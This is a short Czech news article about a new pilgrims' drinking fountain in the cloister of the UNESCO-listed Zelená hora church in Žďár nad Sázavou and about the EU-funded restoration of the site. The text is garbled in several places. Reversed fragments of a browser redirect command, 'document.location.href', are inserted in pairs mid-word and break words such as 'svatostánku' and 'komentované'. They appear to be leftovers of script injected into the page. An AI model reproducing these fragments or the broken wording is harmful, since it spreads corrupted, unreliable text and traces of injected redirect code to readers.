Rainbow page separator

V ambitu kostela na Zelené hoře slouží pítko pro poutníky

Pondělí, 30. srpna 2021

Žďár nad Sázavou / Pítko pro poutníky a návštěvníky je nyní k dispozici v ambitu kostela svatého Jana Nepomuckého na Zelené hoře, památce UNESCO. Do ambitu byly současně přesunuty mramorové dlaždice, které se původně nacházely ve středu sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánku, v jehož interiéru probíhá dokončování rozsáhlých restauračních a rekonstrukčních prací. I přes stavební činnosti jsou v kostele zachovány komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované prohlídky.
Areál unikátního kostela, jenž je dílem významného architekta a zakladatele takzvané barokní gotiky Jana Blažeje Santiniho-Aichla z let 1719-1722, je postupně opravován od roku 2017; komplexní stavební činnosti za bezmála třiačtyřicet milionů korun podpořila evropská dotace. Finišující projekt je zaměřený na opravu exteriéru i interiéru sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánku a kromě obnovy fasády, oken a štukové výzdoby zahrnuje rovněž zrestaurování mobiliáře, podlahy a osvětlení památky. V areálu po srovnání terénu po předchozím vymístění hrobů vznikla takzvaná poutní loučka a cestičky z velkoformá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové žulové dlažby spojující kostel s přístupovými branami. V budoucnosti má přijít na řadu ještě rekonstrukce ambitu.